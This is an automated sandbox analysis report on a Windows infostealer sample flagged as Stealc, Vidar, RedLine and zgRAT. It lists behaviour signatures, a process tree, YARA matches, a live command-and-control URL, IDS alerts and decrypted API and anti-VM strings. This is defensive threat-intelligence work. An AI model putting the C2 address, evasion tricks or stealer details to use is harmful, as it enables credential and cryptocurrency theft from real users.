Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zLwT7vCojz.exe

Overview

General Information

Sample name:zLwT7vCojz.exe
renamed because original name is a hash value
Original sample name:577592f54bb4b19d416913b1816f7971.exe
Analysis ID:1430197
MD5:577592f54bb4b19d416913b1816f7971
SHA1:b36d64d5c46982f85c890d129c439a678299d11e
SHA256:1e9f56f3709d1ecef0ebd00e173acf65f93d84439647a193ae558728dddff327
Tags:exeStealc
Infos:

Detection

Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mars stealer
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
Yara detected Vidar stealer
Yara detected zgRAT
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Connects to many ports of the same IP (likely port scanning)
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking locale)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • zLwT7vCojz.exe (PID: 5496 cmdline: "C:\Users\user\Desktop\zLwT7vCojz.exe" MD5: 577592F54BB4B19D416913B1816F7971)
    • u48o.0.exe (PID: 3912 cmdline: "C:\Users\user~1\AppData\Local\Temp\u48o.0.exe" MD5: 65A31455A497CAEE44C5AA749C50E40B)
      • WerFault.exe (PID: 8032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 2020 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • Qg_Appv5.exe (PID: 2688 cmdline: "C:\Users\user~1\AppData\Local\Temp\Qg_Appv5.exe" MD5: 54D53F5BDB925B3ED005A84B5492447F)
      • UniversalInstaller.exe (PID: 7176 cmdline: C:\Users\user~1\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)
        • UniversalInstaller.exe (PID: 7228 cmdline: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)
          • cmd.exe (PID: 7404 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • MSBuild.exe (PID: 7996 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • u48o.1.exe (PID: 648 cmdline: "C:\Users\user~1\AppData\Local\Temp\u48o.1.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)
      • SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (PID: 7808 cmdline: "C:\Users\user~1\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1 MD5: 8E9C467EAC35B35DA1F586014F29C330)
    • WerFault.exe (PID: 5916 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 1476 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • UniversalInstaller.exe (PID: 1920 cmdline: "C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe" MD5: 9FB4770CED09AAE3B437C1C6EB6D7334)
    • cmd.exe (PID: 1180 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 6420 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}
{"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\wyftaheqJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    C:\Users\user\AppData\Local\Temp\wyftaheqJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      C:\Users\user\AppData\Local\Temp\wyftaheqMALWARE_Win_Arechclient2Detects Arechclient2 RATditekSHen
      • 0xb823a:$s14: keybd_event
      • 0xbef6f:$v1_1: grabber@
      • 0xb8e03:$v1_2: <BrowserProfile>k__
      • 0xb987c:$v1_3: <SystemHardwares>k__
      • 0xb993b:$v1_5: <ScannedWallets>k__
      • 0xb99cb:$v1_6: <DicrFiles>k__
      • 0xb99a7:$v1_7: <MessageClientFiles>k__
      • 0xb9d71:$v1_8: <ScanBrowsers>k__BackingField
      • 0xb9dc3:$v1_8: <ScanWallets>k__BackingField
      • 0xb9de0:$v1_8: <ScanScreen>k__BackingField
      • 0xb9e1a:$v1_8: <ScanVPN>k__BackingField
      • 0xab6aa:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost
      • 0xaafb6:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
      C:\Users\user\AppData\Local\Temp\pfswlxyJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        C:\Users\user\AppData\Local\Temp\pfswlxyJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          Click to see the 2 entries
          SourceRuleDescriptionAuthorStrings
          0000000A.00000003.1291217961.0000000005CC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000000A.00000003.1291217961.0000000005CC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
              0000001E.00000002.1802561648.0000000003DE5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                    Click to see the 34 entries
                    SourceRuleDescriptionAuthorStrings
                    10.3.u48o.0.exe.5cc0000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      10.3.u48o.0.exe.5cc0000.0.raw.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                        22.2.cmd.exe.52f0e64.2.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                          22.2.cmd.exe.52f0e64.2.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                          • 0x1d108:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                          • 0x1d193:$s1: CoGetObject
                          • 0x1d0ec:$s2: Elevation:Administrator!new:
                          10.2.u48o.0.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                            Click to see the 77 entries

                            System Summary

                            barindex
                            Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\u48o.0.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\u48o.0.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\u48o.0.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\u48o.0.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\u48o.0.exe, ParentCommandLine: "C:\Users\user\Desktop\zLwT7vCojz.exe", ParentImage: C:\Users\user\Desktop\zLwT7vCojz.exe, ParentProcessId: 5496, ParentProcessName: zLwT7vCojz.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\u48o.0.exe" , ProcessId: 3912, ProcessName: u48o.0.exe
                            Timestamp:04/23/24-09:43:14.069288
                            SID:2051828
                            Source Port:80
                            Destination Port:49703
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:04/23/24-09:43:08.941626
                            SID:2856233
                            Source Port:49699
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:04/23/24-09:43:14.396563
                            SID:2051831
                            Source Port:80
                            Destination Port:49703
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:04/23/24-09:43:13.760484
                            SID:2044244
                            Source Port:49703
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:04/23/24-09:43:13.365491
                            SID:2044243
                            Source Port:49703
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:04/23/24-09:43:14.083688
                            SID:2044246
                            Source Port:49703
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: zLwT7vCojz.exeAvira: detected
                            Source: C:\Users\user\AppData\Local\Temp\pfswlxyAvira: detection malicious, Label: HEUR/AGEN.1307453
                            Source: 0000000A.00000003.1291217961.0000000005CC0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
                            Source: u48o.0.exe.3912.10.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.172.128.76/3cd2b41cbde8fc9c.php"}
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dllReversingLabs: Detection: 18%
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dllVirustotal: Detection: 12%Perma Link
                            Source: C:\Users\user\AppData\Local\Temp\pfswlxyReversingLabs: Detection: 59%
                            Source: C:\Users\user\AppData\Local\Temp\pfswlxyVirustotal: Detection: 60%Perma Link
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeReversingLabs: Detection: 36%
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeVirustotal: Detection: 42%Perma Link
                            Source: C:\Users\user\AppData\Local\Temp\wyftaheqReversingLabs: Detection: 59%
                            Source: C:\Users\user\AppData\Local\Temp\wyftaheqVirustotal: Detection: 60%Perma Link
                            Source: zLwT7vCojz.exeReversingLabs: Detection: 39%
                            Source: zLwT7vCojz.exeVirustotal: Detection: 40%Perma Link
                            Source: C:\Users\user\AppData\Local\Temp\pfswlxyJoe Sandbox ML: detected
                            Source: zLwT7vCojz.exeJoe Sandbox ML: detected
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: INSERT_KEY_HERE
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetProcAddress
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: LoadLibraryA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: lstrcatA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: OpenEventA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: CreateEventA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: CloseHandle
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Sleep
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetUserDefaultLangID
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: VirtualAllocExNuma
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: VirtualFree
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetSystemInfo
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: VirtualAlloc
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: HeapAlloc
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetComputerNameA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: lstrcpyA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetProcessHeap
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetCurrentProcess
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: lstrlenA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: ExitProcess
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GlobalMemoryStatusEx
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetSystemTime
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: SystemTimeToFileTime
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: advapi32.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: gdi32.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: user32.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: crypt32.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: ntdll.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetUserNameA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: CreateDCA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetDeviceCaps
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: ReleaseDC
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: CryptStringToBinaryA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: sscanf
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: VMwareVMware
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: HAL9TH
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: JohnDoe
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: DISPLAY
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: %hu/%hu/%hu
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: http://185.172.128.76
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: /3cd2b41cbde8fc9c.php
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: /15f649199f40275b/
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: default10
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetEnvironmentVariableA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetFileAttributesA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GlobalLock
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: HeapFree
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetFileSize
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GlobalSize
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: CreateToolhelp32Snapshot
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: IsWow64Process
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Process32Next
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetLocalTime
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: FreeLibrary
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetTimeZoneInformation
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetSystemPowerStatus
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetVolumeInformationA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetWindowsDirectoryA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: Process32First
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetLocaleInfoA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetUserDefaultLocaleName
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetModuleFileNameA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: DeleteFileA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: FindNextFileA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: LocalFree
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: FindClose
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: SetEnvironmentVariableA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: LocalAlloc
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetFileSizeEx
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: ReadFile
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: SetFilePointer
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: WriteFile
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: CreateFileA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: FindFirstFileA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: CopyFileA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: VirtualProtect
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetLogicalProcessorInformationEx
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetLastError
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: lstrcpynA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: MultiByteToWideChar
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GlobalFree
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: WideCharToMultiByte
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GlobalAlloc
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: OpenProcess
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: TerminateProcess
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetCurrentProcessId
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: gdiplus.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: ole32.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: bcrypt.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: wininet.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: shlwapi.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: shell32.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: psapi.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: rstrtmgr.dll
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: CreateCompatibleBitmap
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: SelectObject
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: BitBlt
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: DeleteObject
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: CreateCompatibleDC
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GdipGetImageEncodersSize
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GdipGetImageEncoders
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GdiplusStartup
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GdiplusShutdown
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GdipSaveImageToStream
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GdipDisposeImage
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GdipFree
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetHGlobalFromStream
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: CreateStreamOnHGlobal
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: CoUninitialize
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: CoInitialize
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: CoCreateInstance
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: BCryptGenerateSymmetricKey
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: BCryptCloseAlgorithmProvider
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: BCryptDecrypt
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: BCryptSetProperty
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: BCryptDestroyKey
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: BCryptOpenAlgorithmProvider
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetWindowRect
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetDesktopWindow
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetDC
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: CloseWindow
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: wsprintfA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: EnumDisplayDevicesA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: GetKeyboardLayoutList
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: CharToOemW
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: wsprintfW
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: RegQueryValueExA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: RegEnumKeyExA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: RegOpenKeyExA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: RegCloseKey
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: RegEnumValueA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: CryptBinaryToStringA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: CryptUnprotectData
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: SHGetFolderPathA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: ShellExecuteExA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: InternetOpenUrlA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: InternetConnectA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: InternetCloseHandle
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: InternetOpenA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: HttpSendRequestA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: HttpOpenRequestA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: InternetReadFile
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: InternetCrackUrlA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: StrCmpCA
                            Source: 10.3.u48o.0.exe.5cc0000.0.raw.unpackString decryptor: StrStrA
